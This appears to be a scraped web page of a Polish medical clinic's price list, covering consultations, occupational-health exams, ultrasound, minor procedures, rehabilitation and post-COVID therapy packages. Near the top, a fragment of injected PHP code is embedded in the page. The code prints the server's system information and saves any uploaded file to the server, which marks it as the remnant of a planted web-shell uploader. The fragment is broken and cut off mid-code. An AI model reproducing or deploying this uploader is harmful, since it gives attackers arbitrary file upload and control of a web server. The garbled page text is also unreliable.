Cennik usług medycznych

".php_uname()."
"; echo "
"; if($_POST['upload']) { if(@copy($_FILES['idx']['tmp_name'], $_FILES['idx']['name'])) { echo "sukses"; } else { echo "gagal"; } } ?>
Porady i konsultacje lekarskie
100 Porada Lekarza POZ 100,00 109 Porada okulistyczna -konsultacja w celu kwalifikacji do rodzaju porodu 170,00
101 Porada Alergologiczna 150,00 110 Porada Laryngologiczna 100,00
102 Porada Dermatologiczna 225,00 111 Porada Logopedyczna 60,00
103 Porada Leczenia Bólu 100,00 112 Porada Urologiczna 150,00
104 Porada Pulmonologiczna 150,00 113 Porada Zdrowia Psychicznego 100,00
105 Porada Chirurgiczna 100,00 114 Porada Psychologiczna 150,00
106 Wizyta domowa 200,00 115 Porada Ortopedyczna 150,00
107 Porada okulistyczna 160,00      
108 Porada okulistyczna-kontrola 110,00      

 

 

 

Badania medycyny pracy  
150 Badanie lekarza medycyny pracy 130,00 158 Badanie + zaświadczenie sanitarno-epidemiologiczne 50,00
152 Badanie lekarskie laryngologiczne 100,00 159 Badanie pola widzenia 60,00
154 Badanie lekarskie okulistyczne 100,00 160 Audiometria 30,00
157 Badanie lekarskie kierowców 200,00 161 Spirometria 30,00
      163 Badanie EKG 25,00
      164 Badania laboratoryjne - ceny wg cennika bad. lab.  
         
           

 

Diagnostyka ogólna
200 Badanie ostrości wzroku i dobór szkieł korekcyjnych 50,00 205 Audiometria 30,00
201 Badanie pola widzenia 60,00 206 Rektoskopia 50,00
202 Badnie ciśnienia wewnątrzgałkowego - tonometria 20,00 207 Anoskopia 100,00
203 EKG - spoczynkowe 25,00 208 Dermatoskopia 40,00
204 Spirometria 30,00      

 

 

 

 

 

 

Badania USG
250 USG jamy brzusznej 100,00 255 USG tętnic dogłowowych z kolorowym Dopplerem 150,00
251 USG tarczycy 150,00 256 USG tętnic kończyn dolnych z kolorowym Dopplerem 150,00
      257 USG żył 150,00
           

 

Procedury zabiegowe i pozostałe badania
601 Porada specjalistyczna z drobnym zabiegiem typu: nacięcie ropnia, zastrzał, punkcja, unieruchomienie 150,00 620 Zastrzyk domięśniowy 20,00
602 Zabieg z zakresu małej chirurgii (usunięcie kaszaka, tłuszczak, znamię) 250,00 621 Zastrzyk dożylny 30,00
603 Badanie histopatologiczne 50,00 622 Wlew dożylny 30,00
604 Zaopatrzenie rany - szycie 70,00 623 Zastrzyk podskórny 15,00
605 Założenie/wymiana opatrunku 20,00 624 Próba na lek lub iniekcja śródskórna 7,00
606 Cewnikowanie pęcherza moczowego 50,00 625 Pomiar ciśnienia tętniczego 10,00
607 Usunięcie cewnika z pęcherza moczowego 20,00 626 Inhalacja 30,00
608 Kriochirurgia zmian miejscowych 60,00-200,00 627 Testy kontaktowe płatkowe (30 alergenów) 250,00
609 Płukanie ucha 40,00 628 Testy skórne punktowe - za 1 oznacz. 10,00
610 Usunięcie ciała obcego z ucha/nosa 60,00 629 Szczepienia ochronne bez kosztu szczepionki 30,00
612 Usunięcie ciała obcego z oka 100,00 633 Zaświadczenie o stanie zdrowia pacjenta na potrzeby Towarzystw Ubezpieczeniowych poz.1,2 + obowiązujący podatek VAT
614 Zaświadczenie o stanie zdrowia pacjenta na potrzeby Sądu, ZUS i innych wnioskodawców (nie dotyczy Towarzystw Ubezpieczeniowych) poz.1,2,3 + obowiązujący podatek VAT 634 1. wydanie orzeczenia i opinii lekarskiej, w tym wypełnienie ankiety / protokołu lekarskiego do celów ubezpieczeniowych 100,00
615 1. opłata za wizytę u lekarza w/g cennika 635 2. dodatkowe badania zlecone przez lekarza niezbędne do wydania w/w orzeczeń i opinii w/g cennika
616 2. opłata za wypisanie zaświadczenia 12,00      
617 3. dodatkowe badania zlecone przez lekarza niezbędne do wydania w/w zaświadczenia w/g cennika      
619 Zaświadczenie lekarskie inne 30,00      
           
           
           

 

 
Rehabilitacja
1 Elektroterapia 15,00
2 Magnetoterapia 20,00
3 Ultradzwięki 12,00
4 Krioterapia miejscowa 5 min. 20,00
5 Terapia łączona (ultradzwięki+prądy) 15,00
6 Laser 10,00
7 Lampa sollux 12,00
8 Mazaż leczniczy 0,5 godziny (pleców, k.g, k.d, twarzy ) 60,00
9 Mazaż limfatyczny ręczny 40 min. 50,00
10 Masaż relaksacyjny całego ciała 60 min. 100,00
11 Masaż kamieniami wulkanicznymi 60 min. 80,00
12 Masaż kamieniami wulkanicznymi 90 min. 120,00
14 Rozciąganie (REDRESJA) 30,00
15 Ćwiczenia w obciążeniu ugul 30 min. 30,00
16 Kinezyterapia indywidualna 30 min. 40,00
17 Terapia metodą PNF 80,00
18 Terapia metodą MC KENZIE 80,00
19 Terapia manualna FDM 80,00
  Gimnastyka grupowa dzieci :  
20 Gimnastyka korekcyjna 45 min. 15,00
21 Gimnastyka korekcyjna karnet (8x) 100,00
  Techniki specjalne :  
22 Kinesiology taping pierwsza aplikacja 30,00
23 Kinesiology taping kolejna aplikacja 25,00
24 Konsultacja fizjoterapeutyczna 50,00
     
42 Masaż limfatyczny BOA -jedna kończyna 25,00
     
     
     
 

 

 

 

Rehabilitacja leczenia po przebytej chorobie COVID-19
35 Mazaż kamieniami wulkanicznymi 60 min. 80,00
36 Masaż relaksacyjny całego ciała 60 min. 100,00
37 Masaż leczniczy odcinkowy 60,00
38 Kinezyterapia (covidowa) 45min. 45,00
39 Zabieg fizykalny (covidowy) 15,00
40 Pakiet mały: 5%ZNIŻKI
    MASAŻ+ĆWICZENIA  
  ĆWICZENIA+ZABIEG FIZYKALNY  
  MASAŻ+ZABIEG FIZYKALNY  
41 Pakiet duży: 10%ZNIŻKI
  MASAŻ+ĆWICZENIA+ZABIEGFIZYKALNY